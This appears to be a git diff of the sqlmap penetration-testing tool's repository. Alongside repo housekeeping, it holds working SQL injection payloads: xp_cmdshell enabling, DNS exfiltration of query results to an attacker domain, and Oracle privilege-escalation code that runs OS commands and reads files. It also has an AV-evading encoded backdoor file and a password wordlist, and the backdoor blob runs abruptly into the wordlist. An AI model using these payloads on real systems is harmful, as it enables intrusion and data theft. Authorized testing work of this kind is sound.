diff --git a/.gitattributes b/.gitattributes
index 806cf1b9a63..a99321d231b 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -1,8 +1,18 @@
*.conf text eol=lf
+*.json text eol=lf
+*.html text eol=lf
*.md text eol=lf
*.md5 text eol=lf
+*.pl text eol=lf
*.py text eol=lf
+*.sh text eol=lf
+*.sql text eol=lf
+*.txt text eol=lf
*.xml text eol=lf
+*.yaml text eol=lf
+*.yml text eol=lf
+LICENSE text eol=lf
+COMMITMENT text eol=lf
*_ binary
*.dll binary
diff --git a/.github/CODE_OF_CONDUCT.md b/.github/CODE_OF_CONDUCT.md
new file mode 100644
index 00000000000..2a36badf3f6
--- /dev/null
+++ b/.github/CODE_OF_CONDUCT.md
@@ -0,0 +1,46 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment include:
+
+* Using welcoming and inclusive language
+* Being respectful of differing viewpoints and experiences
+* Gracefully accepting constructive criticism
+* Focusing on what is best for the community
+* Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery and unwelcome sexual attention or advances
+* Trolling, insulting/derogatory comments, and personal or political attacks
+* Public or private harassment
+* Publishing others' private information, such as a physical or electronic address, without explicit permission
+* Other conduct which could reasonably be considered inappropriate in a professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/4/
diff --git a/doc/CONTRIBUTING.md b/.github/CONTRIBUTING.md
similarity index 98%
rename from doc/CONTRIBUTING.md
rename to .github/CONTRIBUTING.md
index 31b389e6070..2ae80685613 100644
--- a/doc/CONTRIBUTING.md
+++ b/.github/CONTRIBUTING.md
@@ -24,7 +24,6 @@ Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md)
In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
* Each patch should make one logical change.
-* Wrap code to 76 columns when possible.
* Avoid tabbing, use four blank spaces instead.
* Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
new file mode 100644
index 00000000000..e6b299956eb
--- /dev/null
+++ b/.github/FUNDING.yml
@@ -0,0 +1 @@
+github: sqlmapproject
diff --git a/.github/ISSUE_TEMPLATE/bug_report.md b/.github/ISSUE_TEMPLATE/bug_report.md
new file mode 100644
index 00000000000..0a2d0fe4aea
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/bug_report.md
@@ -0,0 +1,37 @@
+---
+name: Bug report
+about: Create a report to help us improve
+title: ''
+labels: bug report
+assignees: ''
+
+---
+
+**Describe the bug**
+A clear and concise description of what the bug is.
+
+**To Reproduce**
+1. Run '...'
+2. See error
+
+**Expected behavior**
+A clear and concise description of what you expected to happen.
+
+**Screenshots**
+If applicable, add screenshots to help explain your problem.
+
+**Running environment:**
+ - sqlmap version [e.g. 1.7.2.12#dev]
+ - Installation method [e.g. pip]
+ - Operating system: [e.g. Microsoft Windows 11]
+ - Python version [e.g. 3.11.2]
+
+**Target details:**
+ - DBMS [e.g. Microsoft SQL Server]
+ - SQLi techniques found by sqlmap [e.g. error-based and boolean-based blind]
+ - WAF/IPS [if any]
+ - Relevant console output [if any]
+ - Exception traceback [if any]
+
+**Additional context**
+Add any other context about the problem here.
diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md
new file mode 100644
index 00000000000..e301d68ce74
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@@ -0,0 +1,20 @@
+---
+name: Feature request
+about: Suggest an idea for this project
+title: ''
+labels: feature request
+assignees: ''
+
+---
+
+**Is your feature request related to a problem? Please describe.**
+A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
+
+**Describe the solution you'd like**
+A clear and concise description of what you want to happen.
+
+**Describe alternatives you've considered**
+A clear and concise description of any alternative solutions or features you've considered.
+
+**Additional context**
+Add any other context or screenshots about the feature request here.
diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
new file mode 100644
index 00000000000..0ecd5cd3fbc
--- /dev/null
+++ b/.github/workflows/tests.yml
@@ -0,0 +1,28 @@
+on:
+ push:
+ branches: [ master ]
+ pull_request:
+ branches: [ master ]
+
+jobs:
+ build:
+ runs-on: ${{ matrix.os }}
+ strategy:
+ matrix:
+ os: [ubuntu-latest, macos-latest, windows-latest]
+ python-version: [ 'pypy-2.7', '3.13' ]
+ exclude:
+ - os: macos-latest
+ python-version: 'pypy-2.7'
+ steps:
+ - uses: actions/checkout@v2
+ - name: Set up Python
+ uses: actions/setup-python@v2
+ with:
+ python-version: ${{ matrix.python-version }}
+ - name: Basic import test
+ run: python -c "import sqlmap; import sqlmapapi"
+ - name: Smoke test
+ run: python sqlmap.py --smoke
+ - name: Vuln test
+ run: python sqlmap.py --vuln
diff --git a/.gitignore b/.gitignore
index 81f58777842..1f7f94a3b1e 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,6 +1,8 @@
-*.py[cod]
output/
+__pycache__/
+*.py[cod]
.sqlmap_history
traffic.txt
*~
+req*.txt
.idea/
\ No newline at end of file
diff --git a/.travis.yml b/.travis.yml
deleted file mode 100644
index 7bfe0cef721..00000000000
--- a/.travis.yml
+++ /dev/null
@@ -1,6 +0,0 @@
-language: python
-python:
- - "2.6"
- - "2.7"
-script:
- - python -c "import sqlmap; import sqlmapapi"
diff --git a/ISSUE_TEMPLATE.md b/ISSUE_TEMPLATE.md
deleted file mode 100644
index 062912bd61c..00000000000
--- a/ISSUE_TEMPLATE.md
+++ /dev/null
@@ -1,26 +0,0 @@
-## What's the problem (or question)?
-
-
-
-## Do you have an idea for a solution?
-
-
-
-## How can we reproduce the issue?
-
-1.
-2.
-3.
-4.
-
-## What are the running context details?
-
-* Installation method (e.g. `pip`, `apt-get`, `git clone` or `zip`/`tar.gz`):
-* Client OS (e.g. `Microsoft Windows 10`)
-* Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation):
-* Target DBMS (e.g. `Microsoft SQL Server`):
-* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`):
-* SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`):
-* Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works):
-* Relevant console output (if any):
-* Exception traceback (if any):
diff --git a/doc/COPYING b/LICENSE
similarity index 93%
rename from doc/COPYING
rename to LICENSE
index 8854b1339a4..4973329375b 100644
--- a/doc/COPYING
+++ b/LICENSE
@@ -1,7 +1,7 @@
COPYING -- Describes the terms under which sqlmap is distributed. A copy
of the GNU General Public License (GPL) is appended to this file.
-sqlmap is (C) 2006-2017 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2025 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
This program is free software; you may redistribute and/or modify it under
the terms of the GNU General Public License as published by the Free
@@ -31,6 +31,9 @@ interpretation of derived works with some common examples. Our
interpretation applies only to sqlmap - we do not speak for other people's
GPL works.
+This license does not apply to the third-party components. More details can
+be found inside the file 'doc/THIRD-PARTY.md'.
+
If you have any questions about the GPL licensing restrictions on using
sqlmap in non-GPL works, we would be happy to help. As mentioned above,
we also offer alternative license to integrate sqlmap into proprietary
@@ -343,29 +346,3 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
-
-****************************************************************************
-
-This license does not apply to the following components:
-
-* The Ansistrm library located under thirdparty/ansistrm/.
-* The Beautiful Soup library located under thirdparty/beautifulsoup/.
-* The Bottle library located under thirdparty/bottle/.
-* The Chardet library located under thirdparty/chardet/.
-* The ClientForm library located under thirdparty/clientform/.
-* The Colorama library located under thirdparty/colorama/.
-* The Fcrypt library located under thirdparty/fcrypt/.
-* The Gprof2dot library located under thirdparty/gprof2dot/.
-* The KeepAlive library located under thirdparty/keepalive/.
-* The Magic library located under thirdparty/magic/.
-* The MultipartPost library located under thirdparty/multipartpost/.
-* The Odict library located under thirdparty/odict/.
-* The Oset library located under thirdparty/oset/.
-* The PrettyPrint library located under thirdparty/prettyprint/.
-* The PyDes library located under thirdparty/pydes/.
-* The SocksiPy library located under thirdparty/socks/.
-* The Termcolor library located under thirdparty/termcolor/.
-* The XDot library located under thirdparty/xdot/.
-* The icmpsh tool located under extra/icmpsh/.
-
-Details for the above packages can be found in the THIRD-PARTY.md file.
diff --git a/README.md b/README.md
index ae16583ff1e..6ff34badf5f 100644
--- a/README.md
+++ b/README.md
@@ -1,26 +1,26 @@
-# sqlmap
+# sqlmap 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://x.com/sqlmap)
-sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections.
Screenshots
----

-You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
+You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the features on the wiki.
Installation
----
-You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
+You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
-sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
+sqlmap works out of the box with [Python](https://www.python.org/download/) version **2.6**, **2.7** and **3.x** on any platform.
Usage
----
@@ -34,19 +34,19 @@ To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run [here](https://asciinema.org/a/46601).
-To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+To get an overview of sqlmap capabilities, a list of supported features, and a description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
Links
----
-* Homepage: http://sqlmap.org
+* Homepage: https://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
-* Twitter: [@sqlmap](https://twitter.com/sqlmap)
-* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* X: [@sqlmap](https://x.com/sqlmap)
+* Demos: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
Translations
@@ -55,11 +55,24 @@ Translations
* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [Dutch](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-nl-NL.md)
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
+* [Georgian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ka-GE.md)
+* [German](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-de-DE.md)
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Hindi](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-in-HI.md)
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
+* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
+* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md)
+* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
+* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RU.md)
+* [Serbian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-rs-RS.md)
+* [Slovak](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-sk-SK.md)
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
+* [Ukrainian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-uk-UA.md)
+* [Vietnamese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-vi-VN.md)
diff --git a/data/html/index.html b/data/html/index.html
new file mode 100644
index 00000000000..576f2763b8c
--- /dev/null
+++ b/data/html/index.html
@@ -0,0 +1,151 @@
+
+
+
+
+
+
+ Codestin Search App
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
DEMO
+
+
+
+
+
+
+
+
diff --git a/procs/README.txt b/data/procs/README.txt
similarity index 100%
rename from procs/README.txt
rename to data/procs/README.txt
diff --git a/procs/mssqlserver/activate_sp_oacreate.sql b/data/procs/mssqlserver/activate_sp_oacreate.sql
similarity index 100%
rename from procs/mssqlserver/activate_sp_oacreate.sql
rename to data/procs/mssqlserver/activate_sp_oacreate.sql
diff --git a/procs/mssqlserver/configure_openrowset.sql b/data/procs/mssqlserver/configure_openrowset.sql
similarity index 100%
rename from procs/mssqlserver/configure_openrowset.sql
rename to data/procs/mssqlserver/configure_openrowset.sql
diff --git a/procs/mssqlserver/configure_xp_cmdshell.sql b/data/procs/mssqlserver/configure_xp_cmdshell.sql
similarity index 100%
rename from procs/mssqlserver/configure_xp_cmdshell.sql
rename to data/procs/mssqlserver/configure_xp_cmdshell.sql
diff --git a/procs/mssqlserver/create_new_xp_cmdshell.sql b/data/procs/mssqlserver/create_new_xp_cmdshell.sql
similarity index 100%
rename from procs/mssqlserver/create_new_xp_cmdshell.sql
rename to data/procs/mssqlserver/create_new_xp_cmdshell.sql
diff --git a/procs/mssqlserver/disable_xp_cmdshell_2000.sql b/data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
similarity index 100%
rename from procs/mssqlserver/disable_xp_cmdshell_2000.sql
rename to data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
diff --git a/procs/mssqlserver/dns_request.sql b/data/procs/mssqlserver/dns_request.sql
similarity index 100%
rename from procs/mssqlserver/dns_request.sql
rename to data/procs/mssqlserver/dns_request.sql
diff --git a/procs/mssqlserver/enable_xp_cmdshell_2000.sql b/data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
similarity index 100%
rename from procs/mssqlserver/enable_xp_cmdshell_2000.sql
rename to data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
diff --git a/procs/mssqlserver/run_statement_as_user.sql b/data/procs/mssqlserver/run_statement_as_user.sql
similarity index 100%
rename from procs/mssqlserver/run_statement_as_user.sql
rename to data/procs/mssqlserver/run_statement_as_user.sql
diff --git a/procs/mysql/dns_request.sql b/data/procs/mysql/dns_request.sql
similarity index 100%
rename from procs/mysql/dns_request.sql
rename to data/procs/mysql/dns_request.sql
diff --git a/procs/mysql/write_file_limit.sql b/data/procs/mysql/write_file_limit.sql
similarity index 87%
rename from procs/mysql/write_file_limit.sql
rename to data/procs/mysql/write_file_limit.sql
index 58fccab0a19..e879fbe4030 100644
--- a/procs/mysql/write_file_limit.sql
+++ b/data/procs/mysql/write_file_limit.sql
@@ -1 +1 @@
-LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%--
+LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -
diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql
new file mode 100644
index 00000000000..5dda762c08d
--- /dev/null
+++ b/data/procs/oracle/dns_request.sql
@@ -0,0 +1,3 @@
+SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual
diff --git a/data/procs/oracle/read_file_export_extension.sql b/data/procs/oracle/read_file_export_extension.sql
new file mode 100644
index 00000000000..3d66bbaf53d
--- /dev/null
+++ b/data/procs/oracle/read_file_export_extension.sql
@@ -0,0 +1,4 @@
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
diff --git a/procs/postgresql/dns_request.sql b/data/procs/postgresql/dns_request.sql
similarity index 100%
rename from procs/postgresql/dns_request.sql
rename to data/procs/postgresql/dns_request.sql
diff --git a/data/shell/README.txt b/data/shell/README.txt
new file mode 100644
index 00000000000..4c64c411648
--- /dev/null
+++ b/data/shell/README.txt
@@ -0,0 +1,7 @@
+Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility.
+
+To prepare the original scripts to the cloaked form use this command:
+find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \;
+
+To get back them into the original form use this:
+find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \;
diff --git a/data/shell/backdoors/backdoor.asp_ b/data/shell/backdoors/backdoor.asp_
new file mode 100644
index 00000000000..bc912038c7d
--- /dev/null
+++ b/data/shell/backdoors/backdoor.asp_
@@ -0,0 +1,3 @@
+=ܩt bRU&hR}DtC!3y>7 pQMb-{Y?=lٲ]6a\5
+]iZ*pO|SkC)1Os|Ef@l{a2(Pr8Cөn%fߚ A=@(x~ֱ$ˉ)9
+password
+password!
+password.
+Password
+PASSWORD
+password1
+Password1
+password11
+password12
+password123
+password2
+password3
+password9
+passwords
+passwort
+pastor
+pasuwado
+pasvorto
+pasword
+pat
+patch
+patches
+patches1
+pathetic
+pathfind
+patience
+patoclero
+patrice
+patricia
+patrick
+patrick1
+patriot
+patriots
+patrol
+patton
+patty
+paul
+paula
+paulie
+paulina
+pauline
+paulis
+pavel
+pavement
+pavilion
+pavlov
+payday
+payton
+peace
+peace1
+peach
+peaches
+Peaches
+peaches1
+peachy
+peacock
+peanut
+peanut1
+peanuts
+Peanuts
+pearl
+pearljam
+pearls
+pearson
+pebble
+pebbles
+pecker
+pedro
+pedro1
+peekaboo
+peepee
+peeper
+peewee
+pegasus
+peggy
+pekka
+pelican
+pelirroja
+pencil
+pendejo
+penelope
+penetration
+peng
+penguin
+penguin1
+penguins
+penis
+penny
+penny1
+pentagon
+penthous
+pentium
+Pentium
+people
+peoria
+pepe
+pepito
+pepper
+Pepper
+pepper1
+peppers
+pepsi
+pepsi1
+percolate
+percy
+perfect
+perfect1
+performa
+perfstat
+pericles
+perkele
+perkins
+perlita
+perros
+perry
+persimmon
+person
+persona
+personal
+perstat
+pervert
+petalo
+pete
+peter
+Peter
+peter1
+peterbil
+peterk
+peterpan
+peters
+peterson
+petey
+petra
+petunia
+peugeot
+peyton
+phantom
+pharmacy
+phat
+pheonix
+phialpha
+phil
+philip
+philippe
+philips
+phillies
+phillip
+phillips
+philly
+phish
+phishy
+phoebe
+phoenix
+Phoenix
+phoenix1
+phone
+photo
+photos
+photoshop
+phpbb
+phyllis
+physics
+pian
+piano
+piano1
+pianoman
+pianos
+piao
+piazza
+picard
+picasso
+piccolo
+pickle
+pickles
+picks
+pickup
+pics
+picture
+pierce
+piercing
+pierre
+piff
+pigeon
+piggy
+piglet
+Piglet
+pigpen
+pikachu
+pillow
+pilot
+pimp
+pimpdadd
+pimpin
+pimpin1
+pimping
+pinball
+pineappl
+pineapple
+pinetree
+ping
+pingpong
+pinhead
+pink
+pinkfloy
+pinkfloyd
+pinky
+pinky1
+pinnacle
+piolin
+pioneer
+pipeline
+piper
+piper1
+pippen
+pippin
+pippo
+pirate
+pirates
+pisces
+piscis
+pissing
+pissoff
+pistol
+pistons
+pit
+pitbull
+pitch
+pixies
+pizza
+pizza1
+pizzaman
+pizzas
+pjm
+pk3x7w9W
+placebo
+plane
+planes
+planet
+planning
+plasma
+plastic
+plastics
+platinum
+plato
+platypus
+play
+playa
+playball
+playboy
+playboy1
+player
+player1
+players
+playing
+playmate
+playstat
+playstation
+playtime
+please
+pleasure
+plex
+ploppy
+plover
+plumber
+plus
+pluto
+plymouth
+pm
+pmi
+pn
+po
+po7
+po8
+poa
+pocket
+poetic
+poetry
+pogiako
+point
+pointer
+poipoi
+poison
+poiuy
+poiuyt
+pokemon
+pokemon1
+pokemon123
+poker
+poker1
+poland
+polar
+polaris
+pole
+police
+polina
+polish
+politics
+polly
+polo
+polopolo
+polska
+polynomial
+pom
+pomme
+pompey
+poncho
+pondering
+pong
+pontiac
+pony
+poochie
+poodle
+pooh
+poohbear
+poohbear1
+pookey
+pookie
+Pookie
+pookie1
+pool
+pool6123
+poonam
+poontang
+poop
+pooper
+poopie
+poopoo
+pooppoop
+poopy
+pooter
+popcorn
+popcorn1
+pope
+popeye
+popo
+popopo
+popper
+poppop
+poppy
+pork
+porkchop
+porn
+pornking
+porno
+porno1
+pornos
+pornporn
+porque
+porsche
+porsche1
+porsche9
+porsche911
+portal_demo
+portal_sso_ps
+porter
+portland
+portugal
+pos
+poseidon
+positive
+possum
+post
+postal
+poster
+postman
+potato
+pothead
+potter
+powder
+powell
+power
+power1
+powercartuser
+powers
+ppp
+PPP
+pppp
+ppppp
+pppppp
+ppppppp
+pppppppp
+praise
+prayer
+preacher
+precious
+predator
+prelude
+premier
+premium
+presario
+presiden
+president
+presley
+pressure
+presto
+preston
+pretty
+pretty1
+priest
+primary
+primus
+prince
+prince1
+princesa
+princess
+Princess
+princess1
+princeton
+pringles
+print
+printer
+printing
+prissy
+priv
+private
+private1
+privs
+probes
+prodigy
+prof
+professor
+profile
+profit
+program
+progress
+project
+prometheus
+promise
+property
+prophet
+prospect
+prosper
+protect
+protel
+proton
+protozoa
+provider
+prowler
+proxy
+prozac
+psa
+psalms
+psb
+psp
+p@ssw0rd
+psycho
+pub
+public
+pubsub
+pubsub1
+puck
+puddin
+pudding
+puffin
+puffy
+pukayaco14
+pulgas
+pulsar
+pumper
+pumpkin
+pumpkin1
+pumpkins
+punch
+puneet
+punisher
+punk
+punker
+punkin
+punkrock
+puppet
+puppies
+puppy
+puppydog
+purdue
+purple
+Purple
+purple1
+puss
+pussey
+pussie
+pussies
+pussy
+pussy1
+pussy123
+pussy69
+pussycat
+pussyman
+pussys
+putter
+puzzle
+pv
+pw123
+pyramid
+pyro
+python
+q12345
+q123456
+q1w2e3
+q1w2e3r4
+q1w2e3r4t5
+q1w2e3r4t5y6
+qa
+qawsed
+qaz123
+qazqaz
+qazwsx
+qazwsx1
+qazwsx123
+qazwsxed
+qazwsxedc
+qazxsw
+qdba
+qiang
+qiao
+qing
+qiong
+qosqomanta
+qp
+qq123456
+qqq111
+qqqq
+qqqqq
+qqqqqq
+qqqqqqq
+qqqqqqqq
+qqww1122
+qs
+qs_adm
+qs_cb
+qs_cbadm
+qs_cs
+qs_es
+qs_os
+qs_ws
+quality
+quan
+quantum
+quartz
+quasar
+quattro
+quebec
+queen
+queenie
+queens
+quentin
+querty
+quest
+question
+quincy
+qwaszx
+qwe
+qwe123
+qweasd
+qweasd123
+qweasdzxc
+qweewq
+qweqwe
+qwer
+qwer1234
+qwerasdf
+qwerqwer
+qwert
+Qwert
+qwert1
+qwert123
+qwert12345
+qwert40
+qwerty
+Qwerty
+qwerty1
+qwerty12
+qwerty123
+qwerty1234
+qwerty12345
+qwerty123456
+qwerty321
+qwerty7
+qwerty80
+qwertyu
+qwertyui
+qwertyuiop
+qwertz
+qwewq
+qwqwqw
+r0ger
+r2d2c3po
+rabbit
+Rabbit
+rabbit1
+rabbits
+race
+racecar
+racer
+racerx
+rachael
+rachel
+rachel1
+rachelle
+rachmaninoff
+racing
+racoon
+radar
